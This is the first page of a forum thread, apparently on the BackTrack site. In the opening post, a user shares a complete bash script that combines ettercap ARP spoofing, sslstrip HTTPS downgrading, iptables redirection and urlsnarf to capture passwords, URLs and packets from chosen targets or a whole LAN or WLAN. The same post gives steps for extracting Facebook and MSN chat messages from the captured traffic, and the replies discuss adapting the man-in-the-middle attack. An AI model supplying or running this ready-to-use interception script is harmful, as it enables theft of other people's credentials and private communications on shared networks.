Page 1 of 4 123 ... LastLast
Results 1 to 10 of 45

Thread: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urlsnarf

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    6

    Default Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urlsnarf

    UPDATED SCRIPT 27/4 - added tcpxtract
    UPDATE: How to find facebook chat messages...

    I got very tired of writing commands endlessly while pentesting my network. So i started writing script for anything i do. This script is the one i use mostly.
    Im still very new at Backtrack/Linux, but this script really works for me, and im sure other beginners out there can put it to good use as well.

    First of all, make sure your etter.conf is default. Your etter.conf is located at /etc/etter.conf - this section must remain commented out:
    Code:
    # if you use iptables:
       #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
       #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    This is because i use ettercap to do the arpspoofing, but i dont want it to do the fake certificate thing (we have sslstrip to do the job).

    Save this code to a new text file and save as anything.sh (make sure to chmod to execute, right click->properties->permissions->check "is executable")

    Code:
    #!/bin/bash
    echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
    read -e NOYES
    echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
    read -e XTRACT
    echo -n "What interface to use? ie wlan0: "
    read -e IFACE
    echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
    read -e SESSION
    echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
    read -e ROUTER
    echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
    read -e VICTIM
    mkdir /root/$SESSION/
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    sslstrip -p -k -w /root/$SESSION/$SESSION.log &
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
    ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
    "$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
    "$NOYES"wireshark &
    killall sslstrip
    killall python
    killall urlsnarf
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    etterlog -p -i /root/$SESSION/$SESSION.eci
    Its pretty forward...

    This script will execute sslstrip+log file, urlsnarf (dumping all the urls to a txt file), ettercap with arpspoofing+log files (with the passwords)+pcap file (for further analyze). all the files are put in the same folder, with identical filenames (of course with different extensions).
    Furthermore when quitting the script (and ettercap) properly with the key "q", the script will clean up after itself (shutting down sslstrip,urlsnarf and flushing iptables). At last it automatically reads out passwords from the ettercap logfile (.eci) and runs wireshark for further analyze.

    TIP: For me the easiest way to dump pictures from a pcap file (which the script generates), is by using NetworkMiner for windows. It runs smooth via wine, if you tweak it a bit like this tutorial shows: hxxp://geek00l.blogspot.com/2008/12/drunken-monkey-running-network-miner.html

    HOW TO FIND MSN/FACEBOOK CHAT IN WIRESHARK:
    Finding msn chat is easy. There are many EXPRESSIONS in wireshark, one has the name "MSNMS". If you apply that, it'll show you the messages.

    Finding facebook chat is a bit more complicated. There are no EXPRESSION or filter to use. BUT i found out:
    CTRL+F brings you the search packet command. search for: /ajax/chat/send.php
    ATTENTION: in the search box, check the box that searches by "string" and in search in: Packet List.

    That will give you the packets with the sent messages. When you select the packet, scroll down to the button and expand the "Line-based text data:"

    There you'll have the message if you look carefully.

    Its not that elegant...

    I have not tested this with getting a message back. But that should be fairly easy and almost the same. You can always start the sniffer, send a message or receive a message and then stop sniffing. Then open the pcap in wireshark and look at the packets. Identify the one with the received message and find a way to search for such packet in the future.


    Feel free to ask any questions.

    Teddy Strand
    Last edited by tedbear; 04-27-2010 at 09:46 PM. Reason: updating script...

  2. #2
    Member
    Join Date
    Jan 2010
    Location
    Netherlands
    Posts
    84

    Default Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls

    looks nice but why not use wireshark instead?

  3. #3
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    6

    Default Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls

    For me, wireshark is far more advance and time consuming. I use wireshark to filter out other stuff, such as facebook chat messages, msn messenger etc.

    Wireshark is also capable of showing these passwords, but i find the etterlog or the sslstrip log more fast. That being said, i still have much to learn about wireshark

  4. #4
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    2

    Thumbs up

    hi tedbear,

    thanks for the script. I know the feeling of being tired of writing commands endlessly...:->

    I have a question though,

    In your script you specify iptables redirection to port 10000, but I don't see where you start listening for that port. Do I assume that you are already running an instance of sslstrip that listens to port 10000?

    Also, I have a general question for this sniffing strategy. Perhaps someone will be kind and answer .

    What if someone is running their web server on a different SSL port, say 8443...
    So for this technique to work properly, do we specify the prerouting dst port to be 8443?

    thanks in advance

    tedbear, please ignore my question about port 10000 in my previous post (well if moderators post it soon enough). I read more about sslstrip and figured it out that its a default port it listens on...duh..

    But I have another question though, a bit offtopic, but about the topic.

    The attack you scripted above, as I understand (please correct me if I am wrong) works for the scenario below:

    Victim --- MITM --- Gateway

    Say if this passive attack is successful, then say (ie gmail) credentials of a user of host Victim will be logged in MITM host in clear text.

    However, what about this scenario, is it doable? :

    Victim ---- Gateway ---- MITM ---- Webserver (serves website via SSL).

    Hope someone can answer... haven't tried it yet. Just want to see what people think...

    I am new to this forum, and I see that posts need moderators approval... hopefully, my question will be posted.
    Last edited by Archangel-Amael; 04-24-2010 at 07:24 AM.

  5. #5
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    6

    Default Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls

    As far as i know, the victim will never enter the ssl website at that port or any other port. Sslstrip "strips" the "s" of the https. So for this attack to work, the website visited by the victim has to support both http and https. Ie, visiting gmail connects to their https site, but with sslstrip activatted, victim gets "redirected" or "stripped" to http instead.

    Not sure whether im explaining it so its understandable?

  6. #6
    Member mixit's Avatar
    Join Date
    Jan 2010
    Posts
    104

    Default Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls

    I believe that for the scenario,

    Victim --- MITM --- Gateway

    ,when the victim goes to an https site, the website sends the user a certificate. The MITM intercepts that certificate and then sends the victim a fake certificate with a known encryption key. The victim sends the MITM the encrypted credentials which the MITM can decrypt since he sent the fake certificate to them with a known key. Once decrypted, the MITM encrypts the credentials with the real certificate key and sends it along to the website.

    Also, for the scenario

    Victim ---- Gateway ---- MITM ---- Webserver

    I'm assuming you're talking about a basic NAT situation with a dhcp router or something in a home. In this case, a MITM attack will not work. A MITM attack is based on the ARP protocol, which is only used in LAN's. Read up on basic networking if you are unfamiliar with this.

  7. #7
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    2

    Default Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls

    thanks for your replies.

    however, i am not talking about basic NAT situation, or a home LAN.

    Let me add clarity:

    Assume hypothetical situation. There is a webserver, router (use cisco for this example), and a victim (or victims). Say an adversary is able to do MITM attack between the Webserver and the default router the server talks to. (that is: MITM host is on that vlan, assume ARP poisoning is possible)

    Router <-----> MITM (host) <------> Webserver

    Where: Router (downstream net interface), MITM host, Webserver are all in the same subnet. Now to add more roadblocks to this scenario, lets assume the Webserver only provides its services (ie web mail) via SSL.

    so, if at all possible, given the tools used in scenario 1, how would the attack tactic, strategy change for the latter situation.

    Thoughts?


    Disclaimer: The example and the scenario provided above is hypothetical only. The question is asked for educational purposes only. Any information, suggestion, or input provided to answer the question above will NOT be used to perform any illegal activity.

    UPDATE:
    After playing around a bit, I realized that the situation is trivial for the scenario 2.
    All you need to do is to switch "places" . I hope that makes sense...

    I tested it, works perfectly.


    But, can anybody answer this stupid question:

    How to get the deciphered version of the Digest Authorization password???
    Last edited by iz3us; 04-26-2010 at 08:43 PM. Reason: disclaimer

  8. #8
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    8

    Default Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls

    Thanks for nice script!

    But how should i use sslstrip with a proxy server?

  9. #9
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    1

    Default Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls

    Quote Originally Posted by PipeDevil View Post
    Thanks for nice script!

    But how should i use sslstrip with a proxy server?
    i agree with this. i've follow the tuts, but all i got just the proxy authentification prompt (user and password proxy prompt unencrypted). I cannot see the other user/pass such as facebook,gmail etc, even not with https

    thx 4 caring, sorry for my english, that was lack..

  10. #10
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    3

    Default Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls

    would sites with Extend Validation (EV) give a warning screen about a MITM attack in Firefox?

Page 1 of 4 123 ... LastLast

Similar Threads

  1. cannot driftnet, ettercap, or urlsnarf!
    By xplainet in forum OLD BackTrack 4 General Support
    Replies: 1
    Last Post: 03-29-2010, 08:45 AM
  2. sniffing passwords and hashes from a wireless network
    By kalgecin in forum OLD Wireless
    Replies: 10
    Last Post: 02-14-2010, 04:24 AM
  3. Replies: 8
    Last Post: 11-26-2009, 08:09 AM
  4. Sniffing domain passwords?
    By ESC201 in forum OLD Specialist Topics
    Replies: 6
    Last Post: 01-30-2008, 01:32 AM
  5. ettercap - sniffing works, but I can't see passwords
    By Trick17 in forum OLD BackTrack v2.0 Final
    Replies: 6
    Last Post: 08-29-2007, 09:09 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •